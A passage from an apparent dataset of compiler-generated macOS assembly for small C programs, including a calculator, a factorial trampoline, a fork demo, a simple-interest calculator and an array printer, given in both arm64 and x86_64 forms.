xmm2 = mem[0],zero subsd -24(%rbp), %xmm2 leaq L_.str.5(%rip), %rdi movb $3, %al callq _printf jmp LBB0_6 LBB0_3: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero movsd -16(%rbp), %xmm2 ## xmm2 = mem[0],zero mulsd -24(%rbp), %xmm2 leaq L_.str.6(%rip), %rdi movb $3, %al callq _printf jmp LBB0_6 LBB0_4: movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero movsd -16(%rbp), %xmm2 ## xmm2 = mem[0],zero divsd -24(%rbp), %xmm2 leaq L_.str.7(%rip), %rdi movb $3, %al callq _printf jmp LBB0_6 LBB0_5: leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf LBB0_6: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L0_0_set_3, LBB0_3-LJTI0_0 .set L0_0_set_1, LBB0_1-LJTI0_0 .set L0_0_set_5, LBB0_5-LJTI0_0 .set L0_0_set_2, LBB0_2-LJTI0_0 .set L0_0_set_4, LBB0_4-LJTI0_0 LJTI0_0: .long L0_0_set_3 .long L0_0_set_1 .long L0_0_set_5 .long L0_0_set_2 .long L0_0_set_5 .long L0_0_set_4 .end_data_region ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter an operator (+, -, *,): " L_.str.1: ## @.str.1 .asciz "%c" L_.str.2: ## @.str.2 .asciz "Enter two operands: " L_.str.3: ## @.str.3 .asciz "%lf %lf" L_.str.4: ## @.str.4 .asciz "%.1lf + %.1lf = %.1lf" L_.str.5: ## @.str.5 .asciz "%.1lf - %.1lf = %.1lf" L_.str.6: ## @.str.6 .asciz "%.1lf * %.1lf = %.1lf" L_.str.7: ## @.str.7 .asciz "%.1lf / %.1lf = %.1lf" L_.str.8: ## @.str.8 .asciz "Error! operator is not correct" .subsections_via_symbols
the_stack_data/92254.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/40762802.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _trampoline ; -- Begin function trampoline .p2align 2 _trampoline: ; @trampoline .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldr x8, [x8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #8] ldr x8, [x8] ldr x0, [sp, #8] blr x8 b LBB0_1 LBB0_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _factorial ; -- Begin function factorial .p2align 2 _factorial: ; @factorial .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] ldr x8, [x8, #8] str x8, [sp] ldr x8, [sp] ldr w8, [x8] subs w8, w8, #1 cset w8, gt tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: ldr x8, [sp, #8] ; kill: def $x9 killed $xzr str xzr, [x8] b LBB1_3 LBB1_2: ldr x8, [sp] ldr w10, [x8] ldr x9, [sp] ldr w8, [x9, #4] mul w8, w8, w10 str w8, [x9, #4] ldr x9, [sp] ldr w8, [x9] subs w8, w8, #1 str w8, [x9] b LBB1_3 LBB1_3: add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x8, l___const.main.params@PAGE add x8, x8, l___const.main.params@PAGEOFF ldr x9, [x8] sub x8, x29, #16 stur x9, [x29, #-16] add x0, sp, #16 adrp x9, _factorial@PAGE add x9, x9, _factorial@PAGEOFF str x9, [sp, #16] str x8, [sp, #24] bl _trampoline ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 2 ; @__const.main.params l___const.main.params: .long 10 ; 0xa .long 1 ; 0x1 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _trampoline ## -- Begin function trampoline .p2align 4, 0x90 _trampoline: ## @trampoline .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax cmpq $0, (%rax) je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movq (%rax), %rax movq -8(%rbp), %rdi callq *%rax jmp LBB0_1 LBB0_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _factorial ## -- Begin function factorial .p2align 4, 0x90 _factorial: ## @factorial .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax cmpl $1, (%rax) jg LBB1_2 ## %bb.1: movq -8(%rbp), %rax movq $0, (%rax) jmp LBB1_3 LBB1_2: movq -16(%rbp), %rax movl (%rax), %ecx movq -16(%rbp), %rax imull 4(%rax), %ecx movl %ecx, 4(%rax) movq -16(%rbp), %rax movl (%rax), %ecx addl $-1, %ecx movl %ecx, (%rax) LBB1_3: popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movq L___const.main.params(%rip), %rax movq %rax, -16(%rbp) leaq _factorial(%rip), %rax movq %rax, -32(%rbp) leaq -16(%rbp), %rax movq %rax, -24(%rbp) leaq -32(%rbp), %rdi callq _trampoline movl -12(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 2 ## @__const.main.params L___const.main.params: .long 10 ## 0xa .long 1 ## 0x1 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d\n" .subsections_via_symbols
the_stack_data/144572.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x8, #32767 movk x8, #42182, lsl #16 movk x8, #36222, lsl #32 movk x8, #3, lsl #48 str x8, [sp, #24] mov x8, #16383 movk x8, #4218, lsl #16 movk x8, #23283, lsl #32 str x8, [sp, #16] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf mov w8, #10 stur w8, [x29, #-8] stur wzr, [x29, #-12] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-8] mov w10, #2 sdiv w9, w9, w10 add w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_7 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w8, [x29, #-8] ldur w10, [x29, #-12] sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_5 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] ldur w9, [x29, #-12] sdiv w8, w8, w9 ldur w9, [x29, #-12] add w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 ldr x9, [sp, #24] ldr x10, [sp, #16] add x9, x9, x10 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldursw x8, [x29, #-12] str x8, [sp, #24] ldur w8, [x29, #-8] ldur w9, [x29, #-12] sdiv w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 str x8, [sp, #16] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_1 LBB0_7: ldr x8, [sp, #24] ldr x9, [sp, #16] add x8, x8, x9 subs x8, x8, #2 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movabsq $999999999999999, %rax ## imm = 0x38D7EA4C67FFF movq %rax, -24(%rbp) movabsq $99999999999999, %rax ## imm = 0x5AF3107A3FFF movq %rax, -32(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $10, -8(%rbp) movl $0, -12(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax movl %eax, -36(%rbp) ## 4-byte Spill movl -8(%rbp), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movl -36(%rbp), %eax ## 4-byte Reload addl $1, %ecx cmpl %ecx, %eax jge LBB0_7 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %eax cltd idivl -12(%rbp) cmpl $0, %edx jne LBB0_5 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax cltd idivl -12(%rbp) addl -12(%rbp), %eax cltq movq -24(%rbp), %rcx addq -32(%rbp), %rcx cmpq %rcx, %rax jae LBB0_5 ## %bb.4: ## in Loop: Header=BB0_1 Depth=1 movslq -12(%rbp), %rax movq %rax, -24(%rbp) movl -8(%rbp), %eax cltd idivl -12(%rbp) cltq movq %rax, -32(%rbp) LBB0_5: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_6 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_1 LBB0_7: movq -24(%rbp), %rsi addq -32(%rbp), %rsi subq $2, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -4(%rbp), %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d " .subsections_via_symbols
the_stack_data/248581063.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #24] str w0, [sp, #20] str x1, [sp, #8] mov w8, #1 str w8, [sp, #4] str wzr, [sp] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 mov x9, #4105 sub x8, x29, #18 add x9, x8, x9 mov w8, #65 strb w8, [x9] ldr w9, [sp, #4] ldr w8, [sp] add w8, w8, w9 str w8, [sp] b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp] mov w9, #4105 subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_1 b LBB0_3 LBB0_3: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: bl ___stack_chk_fail LBB0_5: mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -24(%rbp) movl %edi, -28(%rbp) movq %rsi, -40(%rbp) movl $1, -44(%rbp) movl $0, -48(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movb $65, 4087(%rbp) movl -44(%rbp), %eax addl -48(%rbp), %eax movl %eax, -48(%rbp) ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 cmpl $4105, -48(%rbp) ## imm = 0x1009 jle LBB0_1 ## %bb.3: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_5 ## %bb.4: xorl %eax, %eax addq $48, %rsp popq %rbp retq LBB0_5: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/139012.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf bl _getpid mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf bl _fork stur w0, [x29, #-8] ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: bl _getpid mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_3 LBB0_2: sub x0, x29, #12 bl _wait bl _getpid mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_3 LBB0_3: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Hello IIITA!\n" l_.str.1: ; @.str.1 .asciz "I am the parent process and pid is : %d .\n" l_.str.2: ; @.str.2 .asciz "We are before fork\n" l_.str.3: ; @.str.3 .asciz "I am the child process and pid is :%d.\n" l_.str.4: ; @.str.4 .asciz "I am the parent process and pid is: %d .\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf callq _getpid movl %eax, %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf callq _fork movl %eax, -8(%rbp) cmpl $0, -8(%rbp) jne LBB0_2 ## %bb.1: callq _getpid movl %eax, %esi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf jmp LBB0_3 LBB0_2: leaq -12(%rbp), %rdi callq _wait callq _getpid movl %eax, %esi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf LBB0_3: movl -4(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Hello IIITA!\n" L_.str.1: ## @.str.1 .asciz "I am the parent process and pid is : %d .\n" L_.str.2: ## @.str.2 .asciz "We are before fork\n" L_.str.3: ## @.str.3 .asciz "I am the child process and pid is :%d.\n" L_.str.4: ## @.str.4 .asciz "I am the parent process and pid is: %d .\n" .subsections_via_symbols
the_stack_data/518772.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _principle@GOTPAGE ldr x8, [x8, _principle@GOTPAGEOFF] stur x8, [x29, #-8] ; 8-byte Folded Spill adrp x8, _rate@GOTPAGE ldr x8, [x8, _rate@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill adrp x8, _time@GOTPAGE ldr x8, [x8, _time@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur x8, [x29, #-8] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF stur x0, [x29, #-16] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x9, sp str x8, [x9] bl _scanf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x8, [sp, #24] ; 8-byte Folded Reload ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x9, sp str x8, [x9] bl _scanf ldur x8, [x29, #-8] ; 8-byte Folded Reload ldr s0, [x8] fcmp s0, #0.0 cset w8, lt tbnz w8, #0, LBB0_4 b LBB0_1 LBB0_1: ldr x8, [sp, #16] ; 8-byte Folded Reload ldr s0, [x8] fcmp s0, #0.0 cset w8, lt tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr s0, [x8] fcmp s0, #0.0 cset w8, lt tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #24] ; 8-byte Folded Reload ldur x10, [x29, #-8] ; 8-byte Folded Reload ldr s0, [x10] ldr s1, [x9] fmul s0, s0, s1 ldr s1, [x8] fmul s0, s0, s1 mov w8, #1120403456 fmov s1, w8 fdiv s0, s0, s1 adrp x8, _si@GOTPAGE ldr x8, [x8, _si@GOTPAGEOFF] str s0, [x8] ldr s0, [x8] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_5 LBB0_4: adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_5 LBB0_5: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter the Principle \n" l_.str.1: ; @.str.1 .asciz "%f" .comm _principle,4,2 ; @principle l_.str.2: ; @.str.2 .asciz "Enter the Rate (per annum) \n" .comm _rate,4,2 ; @rate l_.str.3: ; @.str.3 .asciz "Enter the time(in years) \n" .comm _time,4,2 ; @time .comm _si,4,2 ; @si l_.str.4: ; @.str.4 .asciz "Simple Intrest =%0.2f \n" l_.str.5: ; @.str.5 .asciz "Invalid \n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function main LCPI0_0: .long 0x42c80000 ## float 100 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movq _principle@GOTPCREL(%rip), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movq _rate@GOTPCREL(%rip), %rsi movb $0, %al callq _scanf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movq _time@GOTPCREL(%rip), %rsi movb $0, %al callq _scanf movq _principle@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero xorps %xmm1, %xmm1 ucomiss %xmm1, %xmm0 jb LBB0_4 ## %bb.1: movq _rate@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero xorps %xmm1, %xmm1 ucomiss %xmm1, %xmm0 jb LBB0_4 ## %bb.2: movq _time@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero xorps %xmm1, %xmm1 ucomiss %xmm1, %xmm0 jb LBB0_4 ## %bb.3: movq _principle@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _time@GOTPCREL(%rip), %rax mulss (%rax), %xmm0 movq _rate@GOTPCREL(%rip), %rax mulss (%rax), %xmm0 movss LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero divss %xmm1, %xmm0 movq _si@GOTPCREL(%rip), %rax movss %xmm0, (%rax) movq _si@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.4(%rip), %rdi movb $1, %al callq _printf jmp LBB0_5 LBB0_4: leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf LBB0_5: popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter the Principle \n" L_.str.1: ## @.str.1 .asciz "%f" .comm _principle,4,2 ## @principle L_.str.2: ## @.str.2 .asciz "Enter the Rate (per annum) \n" .comm _rate,4,2 ## @rate L_.str.3: ## @.str.3 .asciz "Enter the time(in years) \n" .comm _time,4,2 ## @time .comm _si,4,2 ## @si L_.str.4: ## @.str.4 .asciz "Simple Intrest =%0.2f \n" L_.str.5: ## @.str.5 .asciz "Invalid \n" .subsections_via_symbols
the_stack_data/36075100.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #20] add x0, sp, #24 adrp x1, l___const.main.ary@PAGE add x1, x1, l___const.main.ary@PAGEOFF mov x2, #48 bl _memcpy str wzr, [sp, #16] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ; Child Loop BB0_5 Depth 3 ldr w8, [sp, #16] subs w8, w8, #2 cset w8, ge tbnz w8, #0, LBB0_12 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf str wzr, [sp, #12] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_5 Depth 3 ldr w8, [sp, #12] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #12] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf str wzr, [sp, #8] b LBB0_5 LBB0_5: ; Parent Loop BB0_1 Depth=1 ; Parent Loop BB0_3 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #8] subs w8, w8, #2 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=3 ldr w8, [sp, #8] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldrsw x8, [sp, #16] mov x9, #24 mul x9, x8, x9 add x8, sp, #24 add x8, x8, x9 ldrsw x9, [sp, #12] add x8, x8, x9, lsl #3 ldrsw x9, [sp, #8] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=3 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_5 LBB0_8: ; in Loop: Header=BB0_3 Depth=2 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_3 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_1 LBB0_12: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: bl ___stack_chk_fail LBB0_14: mov w0, #0 ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @__const.main.ary l___const.main.ary: .long 1 ; 0x1 .long 2 ; 0x2 .long 3 ; 0x3 .long 4 ; 0x4 .long 5 ; 0x5 .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 9 ; 0x9 .long 10 ; 0xa .long 11 ; 0xb .long 12 ; 0xc .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "class %d\n" l_.str.1: ; @.str.1 .asciz " stu %d:\n" l_.str.2: ; @.str.2 .asciz " sub %d: " l_.str.3: ; @.str.3 .asciz "%d\n" .subsections_via_symbols
